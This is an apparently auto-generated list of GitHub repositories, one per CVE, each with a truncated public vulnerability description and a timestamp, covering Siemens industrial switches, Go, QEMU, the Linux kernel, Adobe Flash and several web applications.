**A vulnerability has been identified in SCALANCE X-200 switch family (incl. SIPLUS NET variants) (All versions < V5.2.5), SCALANCE X-200IRT switch family (incl. SIPLUS NET variants) (All versions < V5.5.0), SCALANCE X-200RNA switch family (All versions < V3.2.7). Devices create a new unique key upon factory reset, excep CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28391](https://github.com/Live-Hack-CVE/CVE-2020-28391) create time: 2022-12-27T18:10:14Z

**A vulnerability has been identified in SCALANCE X-200RNA switch family (All versions < V3.2.7), SCALANCE X-300 switch family (incl. X408 and SIPLUS NET variants) (All versions < V4.1.0). Devices do not create a new unique private key after factory reset. An attacker could leverage this situation to a man-in-the-middle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28395](https://github.com/Live-Hack-CVE/CVE-2020-28395) create time: 2022-12-27T18:10:10Z

**A global buffer overflow was discovered in pngcheck function in pngcheck-2.4.0(5 patches applied) via a crafted png file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35511](https://github.com/Live-Hack-CVE/CVE-2020-35511) create time: 2022-12-27T18:09:09Z

**A code injection vulnerability exists in Pulse Connect Secure <9.1R8 that allows an attacker to crafted a URI to perform an arbitrary code execution via the admin web interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8218](https://github.com/Live-Hack-CVE/CVE-2020-8218) create time: 2022-12-27T17:35:26Z

**An infinite loop flaw was found in the USB xHCI controller emulation of QEMU while computing the length of the Transfer Request Block (TRB) Ring. This flaw allows a privileged guest user to hang the QEMU process on the host, resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14394](https://github.com/Live-Hack-CVE/CVE-2020-14394) create time: 2022-12-27T17:31:13Z

**encoding/xml in Go before 1.15.9 and 1.16.x before 1.16.1 has an infinite loop if a custom TokenReader (for xml.NewTokenDecoder) returns EOF in the middle of an element. This can occur in the Decode, DecodeElement, or Skip method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27918](https://github.com/Live-Hack-CVE/CVE-2021-27918) create time: 2022-12-27T18:12:08Z

**archive/zip in Go 1.16.x before 1.16.1 allows attackers to cause a denial of service (panic) upon attempted use of the Reader.Open API for a ZIP archive in which ../ occurs at the beginning of any filename. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27919](https://github.com/Live-Hack-CVE/CVE-2021-27919) create time: 2022-12-27T18:11:58Z

**Because of a incorrect escaped exec command in MagpieRSS in 0.72 in the /extlib/Snoopy.class.inc file, it is possible to add a extra command to the curl binary. This creates an issue on the /scripts/magpie_debug.php and /scripts/magpie_simple.php page that if you send a specific https url in the RSS URL field, you are CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28940](https://github.com/Live-Hack-CVE/CVE-2021-28940) create time: 2022-12-27T18:11:54Z

**vim is vulnerable to Heap-based Buffer Overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3927](https://github.com/Live-Hack-CVE/CVE-2021-3927) create time: 2022-12-27T18:11:51Z

**The Grav admin plugin prior to version 1.10.11 does not correctly verify caller's privileges. As a consequence, users with the permission `admin.login` can install third-party plugins and their dependencies. By installing the right plugin, an attacker can obtain an arbitrary code execution primitive and elevate their p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29439](https://github.com/Live-Hack-CVE/CVE-2021-29439) create time: 2022-12-27T18:11:47Z

**Composer is a dependency manager for PHP. URLs for Mercurial repositories in the root composer.json and package source download URLs are not sanitized correctly. Specifically crafted URL values allow code to be executed in the HgDriver if hg/Mercurial is installed on the system. The impact to Composer users directly is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29472](https://github.com/Live-Hack-CVE/CVE-2021-29472) create time: 2022-12-27T18:11:32Z

**Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can exploit a new line injection in the configuration edition feature (e.g. mail settings) and gain arbitrary code execution on the server. This issue was addressed in version 2.5.1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39172](https://github.com/Live-Hack-CVE/CVE-2021-39172) create time: 2022-12-27T18:11:16Z

**A vulnerability has been identified in RUGGEDCOM ROS RMC30 V4.X (All versions), RUGGEDCOM ROS RMC8388 V4.X (All versions), RUGGEDCOM ROS RMC8388 V5.X (All versions < V5.7.0), RUGGEDCOM ROS RP110 V4.X (All versions), RUGGEDCOM ROS RS1600 V4.X (All versions), RUGGEDCOM ROS RS1600F V4.X (All versions), RUGGEDCOM ROS RS160 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37209](https://github.com/Live-Hack-CVE/CVE-2021-37209) create time: 2022-12-27T18:10:06Z

**IBM API Connect V10.0.0.0 through V10.0.5.0, V10.0.1.0 through V10.0.1.7, and V2018.4.1.0 through 2018.4.1.19 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site sc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38997](https://github.com/Live-Hack-CVE/CVE-2021-38997) create time: 2022-12-27T17:37:50Z

**ENC DataVault 7.2.3 and before, and OEM versions, use an encryption algorithm that is vulnerable to data manipulation (without knowledge of the key). This is called ciphertext malleability. There is no data integrity mechanism to detect this manipulation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36751](https://github.com/Live-Hack-CVE/CVE-2021-36751) create time: 2022-12-27T17:36:01Z

**A flaw was found in the Linux kernel's OverlayFS subsystem in the way the user mounts the TmpFS filesystem with OverlayFS. This flaw allows a local user to gain access to hidden files that should not be accessible. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3732](https://github.com/Live-Hack-CVE/CVE-2021-3732) create time: 2022-12-27T17:35:43Z

**Cross Site Scripting vulnerability in Hewlett Packard Enterprise Integrated Lights-Out 5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46846](https://github.com/Live-Hack-CVE/CVE-2021-46846) create time: 2022-12-27T17:35:39Z

**A flaw was found in the Linux SCTP stack. A blind attacker may be able to kill an existing SCTP association through invalid chunks if the attacker knows the IP-addresses and port numbers being used and the attacker can send packets with spoofed IP addresses. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3772](https://github.com/Live-Hack-CVE/CVE-2021-3772) create time: 2022-12-27T17:34:46Z

**An out-of-bounds (OOB) memory write flaw was found in the NFSD in the Linux kernel. Missing sanity may lead to a write beyond bmval[bmlen-1] in nfsd4_decode_bitmap4 in fs/nfsd/nfs4xdr.c. In this flaw, a local attacker with user privilege may gain access to out-of-bounds memory, leading to a system integrity and confide CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4090](https://github.com/Live-Hack-CVE/CVE-2021-4090) create time: 2022-12-27T17:34:42Z

**An out-of-bounds memory access flaw was found in the ATI VGA device emulation of QEMU. This flaw occurs in the ati_2d_blt() routine while handling MMIO write operations when the guest provides invalid values for the destination display parameters. A malicious guest could use this flaw to crash the QEMU process on the h CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3638](https://github.com/Live-Hack-CVE/CVE-2021-3638) create time: 2022-12-27T17:31:17Z

**A use-after-free in Busybox 1.35-x's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the copyvar function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30065](https://github.com/Live-Hack-CVE/CVE-2022-30065) create time: 2022-12-27T18:15:04Z

**Dragino Lora LG01 18ed40 IoT v4.3.4 was discovered to contain a Cross-Site Request Forgery in the logout page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45228](https://github.com/Live-Hack-CVE/CVE-2022-45228) create time: 2022-12-27T18:15:00Z

**In certain Secustation products the administrator account password can be read. This affects V2.5.5.3116-S50-SMA-B20171107A, V2.3.4.1301-M20-TSA-B20150617A, V2.5.5.3116-S50-RXA-B20180502A, V2.5.5.3116-S50-SMA-B20190723A, V2.5.5.3116-S50-SMB-B20161012A, V2.3.4.2103-S50-NTD-B20170508B, V2.5.5.3116-S50-SMB-B20160601A, V2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40939](https://github.com/Live-Hack-CVE/CVE-2022-40939) create time: 2022-12-27T18:14:56Z

**There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37886](https://github.com/Live-Hack-CVE/CVE-2022-37886) create time: 2022-12-27T18:14:31Z

**A vulnerability was found in zbl1996 FS-Blog and classified as problematic. This issue affects some unknown processing of the component Title Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-215267. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4400](https://github.com/Live-Hack-CVE/CVE-2022-4400) create time: 2022-12-27T18:14:28Z

**Cross-site Scripting (XSS) - DOM in GitHub repository nuxt/framework prior to v3.0.0-rc.13. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4414](https://github.com/Live-Hack-CVE/CVE-2022-4414) create time: 2022-12-27T18:14:24Z

**A vulnerability was found in TicklishHoneyBee nodau. It has been rated as critical. Affected by this issue is some unknown functionality of the file src/db.c. The manipulation of the argument value/name leads to sql injection. The name of the patch is 7a7d737a3929f335b9717ddbd31db91151b69ad2. It is recommended to apply CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4399](https://github.com/Live-Hack-CVE/CVE-2022-4399) create time: 2022-12-27T18:14:21Z

**A vulnerability was found in morontt zend-blog-number-2. It has been classified as problematic. Affected is an unknown function of the file application/forms/Comment.php of the component Comment Handler. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4397](https://github.com/Live-Hack-CVE/CVE-2022-4397) create time: 2022-12-27T18:14:17Z

**A type confusion issue was addressed with improved memory handling. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42823](https://github.com/Live-Hack-CVE/CVE-2022-42823) create time: 2022-12-27T18:14:14Z

**The web portal of Dragino Lora LG01 18ed40 IoT v4.3.4 has the directory listing at the URL https://10.10.20.74/lib/. This address has a backup file which can be downloaded without any authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45227](https://github.com/Live-Hack-CVE/CVE-2022-45227) create time: 2022-12-27T18:14:10Z

**egg-compile.scm in CHICKEN 5.x before 5.3.1 allows arbitrary OS command execution during package installation via escape characters in a .egg file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45145](https://github.com/Live-Hack-CVE/CVE-2022-45145) create time: 2022-12-27T18:14:07Z

**** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in RDFlib pyrdfa3 and classified as problematic. This issue affects the function _get_option of the file pyRdfa/__init__.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ffd1d62dd50d5f4190013b39ce CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4396](https://github.com/Live-Hack-CVE/CVE-2022-4396) create time: 2022-12-27T18:14:03Z

**A logic issue was addressed with improved state management. This issue is fixed in tvOS 16.1, macOS Ventura 13, watchOS 9.1, Safari 16.1, iOS 16.1 and iPadOS 16. Processing maliciously crafted web content may disclose sensitive user information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42824](https://github.com/Live-Hack-CVE/CVE-2022-42824) create time: 2022-12-27T18:13:59Z

**Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.9. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4408](https://github.com/Live-Hack-CVE/CVE-2022-4408) create time: 2022-12-27T18:13:56Z

**cube-js is a headless business intelligence platform. In version 0.31.23 all authenticated Cube clients could bypass SQL row-level security and run arbitrary SQL via the newly introduced /v1/sql-runner endpoint. This issue has been resolved in version 0.31.24. Users are advised to either upgrade to 0.31.24 or to downgr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23510](https://github.com/Live-Hack-CVE/CVE-2022-23510) create time: 2022-12-27T18:13:44Z

**FreshRSS is a free, self-hostable RSS aggregator. User configuration files can be accessed by a remote user. In addition to user preferences, such configurations contain hashed passwords (brypt with cost 9, salted) of FreshRSS Web interface. If the API is used, the configuration might contain a hashed password (brypt w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23497](https://github.com/Live-Hack-CVE/CVE-2022-23497) create time: 2022-12-27T18:13:41Z

**Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository thorsten/phpmyfaq prior to 3.1.9. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4409](https://github.com/Live-Hack-CVE/CVE-2022-4409) create time: 2022-12-27T18:13:37Z

**Spring boot admins is an open source administrative user interface for management of spring boot applications. All users who run Spring Boot Admin Server, having enabled Notifiers (e.g. Teams-Notifier) and write access to environment variables via UI are affected. Users are advised to upgrade to the most recent release CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46166](https://github.com/Live-Hack-CVE/CVE-2022-46166) create time: 2022-12-27T18:13:23Z

**ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library. Prior to version 2.3.0.0, the default implementation of `Validator.getValidDirectoryPath(String, String, File, boolean)` may incorrectly treat the tested input string as a child of the specified parent directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23457](https://github.com/Live-Hack-CVE/CVE-2022-23457) create time: 2022-12-27T18:13:16Z

**ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library. Prior to version 2.3.0.0, there is a potential for a cross-site scripting vulnerability in ESAPI caused by a incorrect regular expression for "onsiteURL" in the **antisamy-esapi.xml** configuration file that can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24891](https://github.com/Live-Hack-CVE/CVE-2022-24891) create time: 2022-12-27T18:13:13Z

**A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30526](https://github.com/Live-Hack-CVE/CVE-2022-30526) create time: 2022-12-27T18:13:09Z

**Openshift 4.9 does not use HTTP Strict Transport Security (HSTS) which may allow man-in-the-middle (MITM) attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3259](https://github.com/Live-Hack-CVE/CVE-2022-3259) create time: 2022-12-27T18:13:05Z

**A vulnerability was found in pallidlight online-course-selection-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-215268. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4401](https://github.com/Live-Hack-CVE/CVE-2022-4401) create time: 2022-12-27T18:12:33Z

**In deletePackageX of DeletePackageHelper.java, there is a possible way for a Guest user to reset pre-loaded applications for other users due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20124](https://github.com/Live-Hack-CVE/CVE-2022-20124) create time: 2022-12-27T18:12:26Z

**A vulnerability has been identified in RUGGEDCOM RM1224 LTE(4G) EU (All versions), RUGGEDCOM RM1224 LTE(4G) NAM (All versions), SCALANCE M804PB (All versions), SCALANCE M812-1 ADSL-Router (Annex A) (All versions), SCALANCE M812-1 ADSL-Router (Annex B) (All versions), SCALANCE M816-1 ADSL-Router (Annex A) (All versions) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34821](https://github.com/Live-Hack-CVE/CVE-2022-34821) create time: 2022-12-27T18:12:23Z

**A vulnerability has been identified in SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), SICAM P850 (All versions < V3.10), S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41665](https://github.com/Live-Hack-CVE/CVE-2022-41665) create time: 2022-12-27T18:12:19Z

**A vulnerability has been identified in APOGEE MBC (PPC) (BACnet) (All versions), APOGEE MBC (PPC) (P2 Ethernet) (All versions), APOGEE MEC (PPC) (BACnet) (All versions), APOGEE MEC (PPC) (P2 Ethernet) (All versions), APOGEE PXC Compact (BACnet) (All versions), APOGEE PXC Compact (P2 Ethernet) (All versions), APOGEE PXC CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38371](https://github.com/Live-Hack-CVE/CVE-2022-38371) create time: 2022-12-27T18:12:15Z

**A vulnerability classified as critical was found in SourceCodester Canteen Management System. This vulnerability affects unknown code of the file ajax_represent.php. The manipulation of the argument customer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4403](https://github.com/Live-Hack-CVE/CVE-2022-4403) create time: 2022-12-27T18:12:12Z

**component/common/network/dhcp/dhcps.c in ambiot amb1_sdk (aka SDK for Ameba1) before 2022-03-11 mishandles data structures for DHCP packet data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29859](https://github.com/Live-Hack-CVE/CVE-2022-29859) create time: 2022-12-27T18:12:05Z

**Hidden functionality vulnerability in multiple Buffalo network devices allows a network-adjacent attacker with an administrative privilege to execute an arbitrary OS command. The affected products/versions are as follows: WCR-300 firmware Ver. 1.87 and earlier, WHR-HP-G300N firmware Ver. 2.00 and earlier, WHR-HP-GN fir CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39044](https://github.com/Live-Hack-CVE/CVE-2022-39044) create time: 2022-12-27T18:12:01Z

**The JavaScript API in Adobe Reader and Acrobat 9.x before 9.5.1 and 10.x before 10.1.3 on Mac OS X and Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0777](https://github.com/Live-Hack-CVE/CVE-2012-0777) create time: 2022-12-27T16:53:57Z

**Adobe Flash Player before 18.0.0.352 and 19.x through 21.x before 21.0.0.242 on Windows and OS X and before 11.2.202.621 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1096, CVE-2016-1098, CVE-2016-109 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4120](https://github.com/Live-Hack-CVE/CVE-2016-4120) create time: 2022-12-27T16:56:17Z

**Adobe Flash Player before 18.0.0.352 and 19.x through 21.x before 21.0.0.242 on Windows and OS X and before 11.2.202.621 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1096, CVE-2016-1098, CVE-2016-109 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4161](https://github.com/Live-Hack-CVE/CVE-2016-4161) create time: 2022-12-27T16:56:14Z

**Adobe Flash Player before 18.0.0.352 and 19.x through 21.x before 21.0.0.242 on Windows and OS X and before 11.2.202.621 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1096, CVE-2016-1098, CVE-2016-109 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4163](https://github.com/Live-Hack-CVE/CVE-2016-4163) create time: 2022-12-27T16:56:07Z

**Adobe Flash Player before 18.0.0.352 and 19.x through 21.x before 21.0.0.242 on Windows and OS X and before 11.2.202.621 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1096, CVE-2016-1098, CVE-2016-109 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4160](https://github.com/Live-Hack-CVE/CVE-2016-4160) create time: 2022-12-27T16:56:04Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1002](https://github.com/Live-Hack-CVE/CVE-2016-1002) create time: 2022-12-27T16:55:46Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0995](https://github.com/Live-Hack-CVE/CVE-2016-0995) create time: 2022-12-27T16:55:14Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0989](https://github.com/Live-Hack-CVE/CVE-2016-0989) create time: 2022-12-27T16:55:04Z

**Integer overflow in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1010](https://github.com/Live-Hack-CVE/CVE-2016-1010) create time: 2022-12-27T16:55:00Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0999](https://github.com/Live-Hack-CVE/CVE-2016-0999) create time: 2022-12-27T16:54:48Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code by us CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0994](https://github.com/Live-Hack-CVE/CVE-2016-0994) create time: 2022-12-27T16:54:38Z

**Integer overflow in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0993](https://github.com/Live-Hack-CVE/CVE-2016-0993) create time: 2022-12-27T16:54:35Z

**Integer overflow in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via unspecified v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0963](https://github.com/Live-Hack-CVE/CVE-2016-0963) create time: 2022-12-27T16:54:32Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0987](https://github.com/Live-Hack-CVE/CVE-2016-0987) create time: 2022-12-27T16:54:00Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0990](https://github.com/Live-Hack-CVE/CVE-2016-0990) create time: 2022-12-27T16:53:33Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0960](https://github.com/Live-Hack-CVE/CVE-2016-0960) create time: 2022-12-27T16:53:12Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0992](https://github.com/Live-Hack-CVE/CVE-2016-0992) create time: 2022-12-27T16:53:09Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0986](https://github.com/Live-Hack-CVE/CVE-2016-0986) create time: 2022-12-27T16:53:05Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0962](https://github.com/Live-Hack-CVE/CVE-2016-0962) create time: 2022-12-27T16:53:02Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (memory c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0961](https://github.com/Live-Hack-CVE/CVE-2016-0961) create time: 2022-12-27T16:52:58Z

**Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allow attackers to execute arbitrary code or cause a denial of service (uninitia CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1005](https://github.com/Live-Hack-CVE/CVE-2016-1005) create time: 2022-12-27T16:52:55Z

**Heap-based buffer overflow in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via uns CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1001](https://github.com/Live-Hack-CVE/CVE-2016-1001) create time: 2022-12-27T16:52:52Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1000](https://github.com/Live-Hack-CVE/CVE-2016-1000) create time: 2022-12-27T16:52:48Z

**Use-after-free vulnerability in Adobe Flash Player before 18.0.0.333 and 19.x through 21.x before 21.0.0.182 on Windows and OS X and before 11.2.202.577 on Linux, Adobe AIR before 21.0.0.176, Adobe AIR SDK before 21.0.0.176, and Adobe AIR SDK & Compiler before 21.0.0.176 allows attackers to execute arbitrary code via u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0998](https://github.com/Live-Hack-CVE/CVE-2016-0998) create time: 2022-12-27T16:52:41Z

